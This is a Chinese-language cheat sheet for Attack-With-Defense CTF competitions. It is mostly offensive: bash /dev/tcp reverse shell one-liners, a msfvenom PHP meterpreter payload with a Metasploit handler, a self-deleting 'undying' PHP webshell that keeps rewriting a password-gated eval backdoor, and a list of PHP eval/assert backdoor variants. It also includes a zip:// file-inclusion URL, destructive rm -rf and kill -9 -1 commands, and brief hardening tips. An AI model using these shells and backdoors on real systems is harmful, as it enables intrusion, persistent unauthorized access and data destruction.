AWD整理
nmap -nv ip n不要域名解析
nmap -sS ip SYN
nmap -T4 -A 高強度
python -c 'import pty;pty.spawn("/bin/bash")'
tar -zcf /tmp/xxx.tar.gz html
tar -xzvf /tmp/xxx.tar.gz
mysqldump –uxxx –pxxx dbname > xxx.sql
passwd
修改網站管理者密碼
update users set password=md5(“xxxxxx”);
修改資料庫密碼
set password for 使用者名@localhost = password('新密碼');
bash -i >& /dev/tcp/10.51.4.222/8384 0>&1
bash -i >& /dev/tcp/10.11.23.226/5555 0>&1
/bin/bash -i &> /dev/tcp/10.51.4.222/8384 0>&1
echo "/bin/bash -i &> /dev/tcp/10.11.20.71/5555 0>&1" | /bin/bash
rm -rf /var/www/html/upload_lab/upload/*
zip:///var/www/html/upload/test.zip#test.php
http://123.206.174.251/include/2/?
op=zip://uploads/ea064516fe1e37af816bb52faa08eeb8589af4c0.png%23p
利用msf
msfvenom -p php/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=5555-f raw > 77778888.php
msfconsole:
use multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 5555
set ExitOnSession false
run -j
php不死馬
caidao
<?php
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = '/var/www/dvwa/.ski12.php';
$file = 'D:\\z_myweb\\phpStudy\\DVWA-master\\dvwa\\busi.php';
$code = '<?php if(md5($_GET["pass"])=="cdd7b7420654eb16c1e1b748d5b7c5b8"){@eval($_POST['a']);}?>';
while (1) {
file_put_contents($file, $code);
//system('touch -m -d "2018-12-01 09:10:12" .ski12.php');
usleep(5000);
}
後門
eval($_POST[“a”]);
assert($_POST[“a”]); 可以寫成$a=“assert”;$a($_POST[a]);
array_filter(array($_POST[“a”]),”assert”);
preg_replace("/test/e",$_POST[“a"],"jutst test");
$func =create_function('',$_POST[‘a’]);$func();
echo array_map(“assert”, array($_POST[“a”]));
call_user_func("assert",$_POST['cmd’]);
call_user_func_array("assert", array($_POST[“a”]));
等等
删除不死馬
kill -9 -1
kill -9 -1
linux建立使用者
useradd -m username1
passwd username1
usermod -a -G sudo username1
防注入
addslashes
htmlspecialchars
![vulnhub DC-4靶機實戰0X01 環境部署[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)